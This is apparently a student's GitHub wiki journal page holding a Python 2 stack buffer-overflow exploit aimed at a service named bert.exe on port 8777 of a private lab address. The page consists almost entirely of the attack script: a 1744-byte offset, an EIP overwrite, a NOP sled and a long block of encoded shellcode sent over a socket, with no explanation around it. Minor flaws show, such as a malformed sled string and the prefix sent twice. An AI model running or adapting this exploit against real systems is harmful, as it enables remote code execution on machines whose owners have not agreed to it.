Buffer Overflow with Bert.exe - Henryisgreat/TechJournal GitHub Wiki
OPEN PORT ON 8777 - prolly bert.exe
#! /usr/bin/python2
import socket;
import sys;
ip="192.168.0.21"
port = 8777 #default TRUN port
prefix = 'BERT /.:/'
offset = 'A' * 1744
eip = "\x3c\x15\x50\x43"
sled = "\x090" * 32
buf = b""
buf += b"\xb8\x7c\x21\xd2\xe7\xd9\xc0\xd9\x74\x24\xf4\x5f"
buf += b"\x29\xc9\xb1\x52\x31\x47\x12\x03\x47\x12\x83\x93"
buf += b"\xdd\x30\x12\x97\xf6\x37\xdd\x67\x07\x58\x57\x82"
buf += b"\x36\x58\x03\xc7\x69\x68\x47\x85\x85\x03\x05\x3d"
buf += b"\x1d\x61\x82\x32\x96\xcc\xf4\x7d\x27\x7c\xc4\x1c"
buf += b"\xab\x7f\x19\xfe\x92\x4f\x6c\xff\xd3\xb2\x9d\xad"
buf += b"\x8c\xb9\x30\x41\xb8\xf4\x88\xea\xf2\x19\x89\x0f"
buf += b"\x42\x1b\xb8\x9e\xd8\x42\x1a\x21\x0c\xff\x13\x39"
buf += b"\x51\x3a\xed\xb2\xa1\xb0\xec\x12\xf8\x39\x42\x5b"
buf += b"\x34\xc8\x9a\x9c\xf3\x33\xe9\xd4\x07\xc9\xea\x23"
buf += b"\x75\x15\x7e\xb7\xdd\xde\xd8\x13\xdf\x33\xbe\xd0"
buf += b"\xd3\xf8\xb4\xbe\xf7\xff\x19\xb5\x0c\x8b\x9f\x19"
buf += b"\x85\xcf\xbb\xbd\xcd\x94\xa2\xe4\xab\x7b\xda\xf6"
buf += b"\x13\x23\x7e\x7d\xb9\x30\xf3\xdc\xd6\xf5\x3e\xde"
buf += b"\x26\x92\x49\xad\x14\x3d\xe2\x39\x15\xb6\x2c\xbe"
buf += b"\x5a\xed\x89\x50\xa5\x0e\xea\x79\x62\x5a\xba\x11"
buf += b"\x43\xe3\x51\xe1\x6c\x36\xf5\xb1\xc2\xe9\xb6\x61"
buf += b"\xa3\x59\x5f\x6b\x2c\x85\x7f\x94\xe6\xae\xea\x6f"
buf += b"\x61\x11\x42\x6e\x64\xf9\x91\x70\xa4\xb0\x1c\x96"
buf += b"\xc2\x52\x49\x01\x7b\xca\xd0\xd9\x1a\x13\xcf\xa4"
buf += b"\x1d\x9f\xfc\x59\xd3\x68\x88\x49\x84\x98\xc7\x33"
buf += b"\x03\xa6\xfd\x5b\xcf\x35\x9a\x9b\x86\x25\x35\xcc"
buf += b"\xcf\x98\x4c\x98\xfd\x83\xe6\xbe\xff\x52\xc0\x7a"
buf += b"\x24\xa7\xcf\x83\xa9\x93\xeb\x93\x77\x1b\xb0\xc7"
buf += b"\x27\x4a\x6e\xb1\x81\x24\xc0\x6b\x58\x9a\x8a\xfb"
buf += b"\x1d\xd0\x0c\x7d\x22\x3d\xfb\x61\x93\xe8\xba\x9e"
buf += b"\x1c\x7d\x4b\xe7\x40\x1d\xb4\x32\xc1\x2d\xff\x1e"
buf += b"\x60\xa6\xa6\xcb\x30\xab\x58\x26\x76\xd2\xda\xc2"
buf += b"\x07\x21\xc2\xa7\x02\x6d\x44\x54\x7f\xfe\x21\x5a"
buf += b"\x2c\xff\x63"
#6250153C
buffer = prefix + offset + eip + sled + buf
print("Fuzzing BERT with %s bytes " % len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((ip,port))
s.send((prefix+buffer))
s.close()